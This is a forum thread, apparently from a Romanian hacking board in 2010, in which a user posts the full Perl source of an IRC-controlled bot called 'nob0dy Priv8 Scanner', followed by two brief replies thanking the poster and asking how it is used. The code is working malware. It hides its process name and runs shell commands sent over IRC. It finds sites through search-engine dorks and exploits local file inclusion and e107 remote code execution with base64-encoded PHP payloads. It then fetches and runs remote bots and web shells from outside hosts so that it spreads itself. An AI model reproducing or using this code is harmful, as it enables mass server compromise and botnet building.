Guest vini4p Posted December 29, 2010 Report Posted December 29, 2010 #!/usr/bin/perl# nob0dy Priv8 Scanner SE v1.2# Coded by Vrs-hCk# ander[at]antisecurity.org# Last Edited: Jun 21 2010# How to use:# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeprocuse HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use Socket;use MIME::Base64;my $datetime = localtime;my $fakeproc = $ARGV[6];$ircserver = $ARGV[0] unless $ircserver;my $ircport = $ARGV[1];my $nickname = $ARGV[2];my $ident = $ARGV[3];my $channel = '#'.$ARGV[4];my $admin = $ARGV[5];my $fullname = "( nob0dy )";my $nob0dy = "15(7@2nob0dy15)";my $lfilogo = "15(7@2LFI15)";my $lfdlogo = "15(7@2LFD15)";my $e107logo = "15(7@2e10715)";my $lficmd = '!lfi';my $lfdcmd = '!lfd';my $e107cmd = '!e107';my $injector = "http://opendoor.ie/logs/logs";my $botshell = "http://antrax.us/tools/bot.pl";my $uagent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";my $lfdoutput = "root:(.+).+).+).+).+).+)";if (@ARGV == 7) { print "\n[+] nob0dy Priv8 Scanner SE\n". "[+] IRC Host : $ircserver\n". "[+] IRC Port : $ircport\n". "[+] Bot Nick : $nickname\n". "[+] Bot Ident : $ident\n". "[+] Channel : $channel\n". "[+] Bot Admin : $admin\n". "[+] Process/PID : $fakeproc - $$\n\n";}else { print "\n[USAGE] perl $0 irc.server.net 6667 nick ident channel admin /usr/sbin/fakeproc\n\n"; exit();}$SIG{'INT'} = 'IGNORE';$SIG{'HUP'} = 'IGNORE';$SIG{'TERM'} = 'IGNORE';$SIG{'CHLD'} = 'IGNORE';$SIG{'PS'} = 'IGNORE';chdir("/");$ircserver = "$ARGV[0]" if $ARGV[0];$0 = "$fakeproc"."\0" x 16;my $pid = fork;exit if $pid;die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);our %irc_servers;our %DCC;my $dcc_sel = new IO::Select->new();$sel_client = IO::Select->new();sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; }}sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; }}sub parse { my $servarg = shift; if ($servarg =~ /^PING \.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?)\s+NICK\s+\\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\.+?)\s+433/i) { nick("$mynick".int rand(999)); } elsif ($servarg =~ m/^\.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("JOIN $channel"); sleep(1); sendraw("PRIVMSG $channel :Hosted by: Midnightcr3w - Private ScanneR"); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); }}my $line_temp;while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "15(7@2Help15)"; ¬ice("$nick","$helplogo 12LFI Vuln Scan:6 $lficmd [bug] [dork]"); ¬ice("$nick","$helplogo 12LFD Vuln Scan:6 $lfdcmd [bug] [dork]"); ¬ice("$nick","$helplogo 12e107 Vuln Scan:6 $e107cmd [bug] [dork]"); } if ($msg=~ /^!response/ || $msg=~ /^!id/) { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { ¬ice("$nick","15(7@2Injector15)6 PHP Shell is 3UP"); } else { ¬ice("$nick","15(7@2Injector15)6 PHP Shell is 4Down"); } } if (&isAdmin($nick) && $msg =~ /^!pid/) { ¬ice("$nick","6Fake Process/PID : $fakeproc - $$"); } ##################################################################### LFD SCAN if ($msg=~ /^$lfdcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$path","$lfdlogo 12Dork :4 $dork"); &msg("$path","$lfdlogo 12Bugz :4 $bug"); &msg("$path","$lfdlogo 6Search Engine Loading ..."); &lfd_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } exit; } } ##################################################################### LFIRCE SCAN if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { my ($bug,$dork) = ($1,$2); &msg("$path","$lfilogo 12Dork :4 $dork"); &msg("$path","$lfilogo 12Bugz :4 $bug"); &msg("$path","$lfilogo 6Search Engine Loading ..."); &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $lfilogo 4PHP Shell is Down!"); } } exit; } } ##################################################################### e107 contact.php SCAN if ($msg=~ /^$e107cmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { my ($bug,$dork) = ($1,$2); &msg("$path","$e107logo 12Dork :4 $dork"); &msg("$path","$e107logo 12Bugz :4 $bug"); &msg("$path","$e107logo 6Search Engine Loading ..."); &e107_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $e107logo 4PHP Shell is Down!"); } } exit; } } ##################################################################### } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } }}#########################################sub lfd_start() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"GooGLe"); } exit; } } if ($engine =~ /alltheweb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"AllTheWeb"); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"Bing"); } exit; } } if ($engine =~ /altavista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"ALtaViSTa"); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"AsK"); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"UoL"); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"YahOo"); } exit; } }}sub lfi_start() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"GooGLe"); } exit; } } if ($engine =~ /alltheweb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"AllTheWeb"); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"Bing"); } exit; } } if ($engine =~ /altavista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"ALtaViSTa"); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"AsK"); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"UoL"); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"YahOo"); } exit; } }}sub e107_start() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"GooGLe"); } exit; } } if ($engine =~ /alltheweb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"AllTheWeb"); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"Bing"); } exit; } } if ($engine =~ /altavista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"ALtaViSTa"); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"AsK"); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"UoL"); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"YahOo"); } exit; } }}#########################################sub lfd() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$lfdlogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.$bug.$lfdtest; my $vuln = "http://".$site."12".$bug."6".$lfdtest; my $html = get_content($test); if ($html =~ /$lfdoutput/) { &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy"); sleep(3); } } }}sub lfi() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$lfilogo(7@2$engine15)10 Scan finish for14 $dork"); } my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../"; my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000"; my $vuln = "http://".$site."12".$bug."6".$dir."7/proc/self/environ%0000"; my $shell = "http://".$site."12".$bug."6".$dir."7/tmp/x-treme%0000"; my $html = get_content($test); if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $code = 'echo "c0li#".php_uname()."#c0li"; if(@copy("'.$injector.'","/tmp/x-treme")) { echo "SUCCESS"; }'; my $res = lfi_env_query($test,encode_base64($code)); &lfi_spread_query($test); $res =~ s/\n//g; if ($res =~ /c0li#(.*)#c0liSUCCESS/sg) { my $sys = $1; &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHell15)4 ".$shell." 15(7@3".$sys."15)$nob0dy"); sleep(4); } elsif ($res =~ /c0li#(.*)#c0li/sg) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'system("wget '.$injector.' -O /tmp/x-treme");'; my $wget = lfi_env_query($test,encode_base64($upload)); sleep(1); my $check = get_content("http://".$site.$bug.$dir."/tmp/x-treme%0000"); sleep(1); if ($check =~ /Hacked by Vrs-hCk/) { &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHeLL15)4 ".$shell." 15(7@3".$sys."15)$nob0dy"); sleep(4); } else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12SysTem15)4 ".$vuln." 15(7@3".$sys."15)$nob0dy"); sleep(4); } } exit; } } else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12EnviRon15)4 ".$vuln." $nob0dy"); } } exit; } sleep(3); } } }}sub e107() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$e107logo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$e107logo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.$bug; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=="; my $html = e107_rce_query($test,$code); if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }'; my $res = e107_rce_query($test,encode_base64($upload)); if ($res =~ /c0liSUKSESc0li/) { &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)");&msg("ScanneD","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(5); } else { &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(5); } &e107_spread_query($test); sleep(2); } exit; } sleep(5); } elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }'; my $res = e107_rce_query($test,encode_base64($upload)); if ($res =~ /c0liSUKSESc0li/) { &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } else { &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } } exit; } sleep(5); } } }}#########################################sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $logo = $_[4]; if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); } if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); } if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); } if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); } if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); } if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); } if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); } @clean = clean(@total); &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); return @clean;}#########################################sub rfi_os() { my $sys = ""; my $url = $_[0]; my $chk = get_content($url); if ($chk =~ /<br>sys:(.+?)<br>/sg) { $sys = $1; } return $sys;}sub rce_os() { my $sys = ""; my $url = $_[0]; my $chk = get_content($url); $chk =~ s/\n//; if ($chk =~ /999(.*)666/sg) { $sys = $1; } return $sys;}sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status;}sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content;}sub lfi_env_query() { my $url = $_[0]; my $code = $_[1]; my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>"); $ua->timeout(10); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content;}sub lfi_spread_query() { my $url = $_[0]; my $botnick = 'x-bot['.(int rand(6666)).']'; my $botchan = $channel; $botchan =~ s/\#//; my $code = "system('rm -rf /tmp/x-bot;wget $botshell -O /tmp/x-bot;perl /tmp/x-bot $ircserver $ircport $botnick xbot $botchan $admin /usr/bin/php');"; my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>"); $ua->timeout(5); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req);}sub e107_rce_query() { my $url = $_[0]; my $code = $_[1]; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $res = $ua->request($req); return $res->content;}sub e107_spread_query() { my $url = $_[0]; my $code = "ICRjbWQ9ImNkIC90bXA7d2dldCBodHRwOi8vMHg2OS5uZXQvbG9nO3BlcmwgbG9nO3BlcmwgbG9nO3JtIC1yZiBsb2ciOw0KJGVzZWd1aWNtZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnOw0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9IA=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $res = $ua->request($req);}######################################### SEARCH ENGINEsub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i); my $res = search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { my $link = $1; if ($link !~ /google/){ my @grep = links($link); push(@list,@grep); } } } return @list;}sub alltheweb() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100) { my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); my $res = search_engine_query($search); while ($res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) { my $link = $1; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } return @list;}sub uol() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=10) { my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i); my $res = search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) { my $link = $1; if ($link !~ /busca|uol|yahoo/) { my @grep = links($link); push(@list,@grep); } } } return @list;}sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=10) { my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE"); my $res = search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { my $link = $1; if ($link !~ /msn|live|bing/) { my @grep = links($link); push(@list,@grep); } } } return @list;}sub altavista() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=10){ my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i); my $res = search_engine_query($search); while ($res =~ m/<span class=ngrn>(.+?)\//g) { my $link = $1; if ($link !~ /altavista/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } } return @list;}sub ask() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=10) { my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i); my $res = search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) { my $link = $1; if ($link !~ /ask\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list;}sub yahoo() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=1) { my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i); my $res = search_engine_query($search); while ($res =~ m/26u=(.*?)%26w=/g) { my $link = $1; if ($link!~ /yahoo/){ my @grep = links($link); push(@list,@grep); } } } return @list;}#########################################sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; push @cln, $element; } return @cln;}sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; return $dork;}sub links() { my @list; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push(@list,$link,$host,$hdir); return @list;}sub search_engine_query() { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n"; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page;}#########################################sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }}}sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status;}sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");}sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]");}sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");} Quote
sTrEs Posted December 29, 2010 Report Posted December 29, 2010 de cand caut ceva asemanator si bun, multumesc! Quote
go_sword Posted December 31, 2010 Report Posted December 31, 2010 # How to use:# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeprocpoate asta ? Quote
